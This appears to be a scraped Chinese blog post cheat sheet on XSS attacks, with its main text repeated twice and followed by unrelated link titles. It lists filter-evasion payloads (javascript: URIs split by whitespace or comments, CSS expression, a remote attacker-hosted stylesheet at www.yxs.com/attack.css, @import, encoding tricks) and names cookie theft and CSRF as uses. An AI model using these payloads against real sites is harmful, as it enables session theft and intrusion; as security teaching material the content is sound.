web安全 xss攻击
来源:互联网 发布:java中的log怎么用 编辑:程序博客网 时间:2024/05/02 07:47
xss 分类
1.反射型:一般出现在搜索栏,用户登陆口等地方
2.持久型:留言,评论,博客日志等地方
xss的构造
1.利用<>标签引入
2.利用hmtl的属性值来执行
eg:<img src="javascript:alert(/xss/)">
属性还有:href,lowsrc,bgsound,background,value,action,dynsrc
3.空格和回车绕过过滤
eg:<img src="java scr ipt:alert(/xss/)">
4.对标签进行转码
<img src="javascript:alert(/xss/);">
5.利用css跨站剖析
1.css直接执行
eg:<div style="background-image:url(javascript:alert('xss'))">
2.css远程引入
eg:http://www.yxs.com/attack.css里面有这些东西
p{
background-image:expression(alert('xss'))
}
然后目标网站的可以引入
<link rel="stylesheet" href="http://www.yxs.com/attack.css">
3.import直接执行
<style>
@import 'javascript:alert("xss")'
</style>
4.利用/***/ \ \0 等扰乱过滤
eg:<img src="javas/***/cript:alert(/xss/)">
5.利用字符编码
eg1:hmtl里面的某些属性值可以用&#ASCII的方式进行编码改写
<img src="j.....t:....">
eg2:eval()可以执行\连接十六进制的的字符串的js脚本
6.拆分跨站法(自己百度去)
对于输入有限制的很有用
7. 远程调用shellcode
xss利用方式
1.cookie的窃取
2.CSRF的伪造表单等东西cookie的欺诈
1.反射型:一般出现在搜索栏,用户登陆口等地方
2.持久型:留言,评论,博客日志等地方
xss的构造
1.利用<>标签引入
2.利用hmtl的属性值来执行
eg:<img src="javascript:alert(/xss/)">
属性还有:href,lowsrc,bgsound,background,value,action,dynsrc
3.空格和回车绕过过滤
eg:<img src="java scr ipt:alert(/xss/)">
4.对标签进行转码
<img src="javascript:alert(/xss/);">
5.利用css跨站剖析
1.css直接执行
eg:<div style="background-image:url(javascript:alert('xss'))">
2.css远程引入
eg:http://www.yxs.com/attack.css里面有这些东西
p{
background-image:expression(alert('xss'))
}
然后目标网站的可以引入
<link rel="stylesheet" href="http://www.yxs.com/attack.css">
3.import直接执行
<style>
@import 'javascript:alert("xss")'
</style>
4.利用/***/ \ \0 等扰乱过滤
eg:<img src="javas/***/cript:alert(/xss/)">
5.利用字符编码
eg1:hmtl里面的某些属性值可以用&#ASCII的方式进行编码改写
<img src="j.....t:....">
eg2:eval()可以执行\连接十六进制的的字符串的js脚本
6.拆分跨站法(自己百度去)
对于输入有限制的很有用
7. 远程调用shellcode
xss利用方式
1.cookie的窃取
2.CSRF的伪造表单等东西cookie的欺诈
0 0
- web安全 xss攻击
- web安全之xss 攻击
- web安全 之 xss攻击
- 浅谈Web安全-XSS攻击
- web安全防范之XSS漏洞攻击
- Web前端安全之XSS攻击
- web安全--xss攻击学习总结
- web前端安全之XSS攻击
- WEB安全测试之XSS攻击
- WEB安全之XSS和CRSF攻击
- Web 安全:前端攻击 XSS 深入解析
- WEB安全实战(二)带你认识 XSS 攻击
- WEB安全实战(三)XSS 攻击的防御
- [Web安全之实战] 跨站脚本攻击XSS
- Web安全之XSS跨站脚本攻击
- web安全之Xss攻击和Sql注入
- 阿里云服务器web应用安全-XSS攻击
- WEB安全实战(三)XSS 攻击的防御
- quick-3.5打包apk中的两个坑
- java学习笔记——API中的常用类和StringBuffer
- poj 1087 A Plug for UNIX 【最大流】
- innodb之change buffer被动merge
- Java URLClassLoader实现插件功能开发
- web安全 xss攻击
- Swift学习笔记(二十三)——Swift泛型初识
- MySQL主从服务器数据一致性的核对与修复
- java学习笔记——日期操作类(date,calendar等)
- 验证码破解
- Android 图片加载库
- 黑马程序员--IO流总结--java
- 基础知识普及帖:百度搜索引擎的工作流程
- (国庆)溧阳天目湖,广德太极洞